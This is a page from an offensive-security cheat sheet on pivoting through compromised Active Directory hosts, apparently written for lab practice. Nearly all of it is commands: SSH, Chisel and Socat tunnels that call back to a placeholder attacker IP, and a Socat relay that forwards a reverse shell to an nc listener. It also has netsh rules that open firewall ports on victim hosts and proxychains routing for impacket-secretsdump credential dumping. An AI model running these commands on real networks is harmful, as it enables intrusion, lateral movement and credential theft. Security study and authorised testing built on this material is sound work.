08 / Pivoting

Pivoting

Route traffic through compromised AD hosts to reach internal network segments. SSH tunnelling, Chisel, Socat and Proxychains to access systems that aren't directly reachable.

Pivoting Through AD Networks

SSH tunnelling, Chisel SOCKS proxies and Proxychains to route nxc, impacket and other AD tools through a compromised host to reach inner segments.

ChiselSSHProxychains

soon

SSH Tunnelling & Port Forwarding

-L / -R / -D

Setup tunnel user on attacker (no shell access)

useradd tunneluser -m -d /home/tunneluser -s /bin/true
passwd tunneluser

Local port forward (-L) — access a host behind pivot

ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN
# now: browse localhost:8000 → reaches 172.16.0.10:80

Remote port forward (-R) — expose target port on attacker

ssh tunneluser@$ATTACKER_IP -R 3389:$TARGET_IP:3389 -N
# then connect locally:
xfreerdp3 /v:127.0.0.1 /u:username /p:password

Local port forward from target

ssh tunneluser@$ATTACKER_IP -L *:80:127.0.0.1:80 -N
# open firewall rule if needed:
netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80

Dynamic port forward / SOCKS proxy (-D)

ssh -D 1337 user@172.16.0.5 -fN
# or remote dynamic:
ssh tunneluser@$ATTACKER_IP -R 9050 -N

Configure proxychains

sudo nano /etc/proxychains.conf
# add under [ProxyList]:
socks4  127.0.0.1 9050
# use:
proxychains curl http://pxeboot.za.tryhackme.com
proxychains nxc smb 172.16.0.0/24
proxychains impacket-secretsdump ...

Proxychains

socks4/5

Copy conf to current directory (proxychains uses local conf first)

cp /etc/proxychains.conf .

Configure

sudo nano /etc/proxychains.conf
# uncomment: strict_chain
# uncomment: proxy_dns
# clear [ProxyList] and add:
socks5  127.0.0.1 9050

Use through proxy

proxychains curl https://target.com
proxychains nmap -sT target.com        # TCP only through proxychains
proxychains ssh user@target
proxychains nxc smb 10.10.10.10

Chisel

reverse SOCKS / forward / port forward

Reverse SOCKS proxy (preferred in AD — target calls back)

# Attacker:
./chisel server -p $ATTACKER_PORT --reverse &
# Target:
./chisel client $ATTACKER_IP:$ATTACKER_PORT R:socks &
# Proxy opens on 127.0.0.1:1080 — use socks5 127.0.0.1 1080 in proxychains

Forward SOCKS proxy

# Target:
./chisel server -p $TARGET_PORT --socks5
# Attacker:
./chisel client $TARGET_IP:$TARGET_PORT 1337:socks

Remote port forward

# Attacker:
./chisel server -p 1337 --reverse &
# Target:
./chisel client 172.16.0.20:1337 R:2222:172.16.0.10:22 &
# Now: ssh -p 2222 user@127.0.0.1 reaches 172.16.0.10:22

Local port forward

# Target:
./chisel server -p 8000
# Attacker:
./chisel client 172.16.0.5:8000 2222:172.16.0.10:22

proxychains.conf for chisel SOCKS5

[ProxyList]
socks5  127.0.0.1 1080

Socat

relay / port forward

Reverse shell relay — target relays shell to attacker

# Attacker:
sudo nc -lvnp 443
# Target (pivot host):
./socat tcp-l:8000 tcp:$ATTACKER_IP:443 &

Port forward (easy)

./socat TCP4-LISTEN:3389,fork TCP4:$TARGET_IP:3389
# add firewall rule if needed:
netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389

Port forward (quiet — no port opened on pivot)

# Attacker:
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
# Target:
./socat tcp:$ATTACKER_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork &
# Now: localhost:8000 on attacker → TARGET_IP:TARGET_PORT

sshuttle (Linux → Linux only)

transparent proxy

sshuttle -r user@$TARGET_IP 172.16.0.0/24 -x $TARGET_IP
sshuttle -r user@$TARGET_IP --ssh-cmd "ssh -i KEYFILE" 172.16.0.0/24 -x $TARGET_IP
sshuttle -r user@$TARGET_IP -N   # auto-detect subnet

← Post Exploitation Next: Data Exfiltration →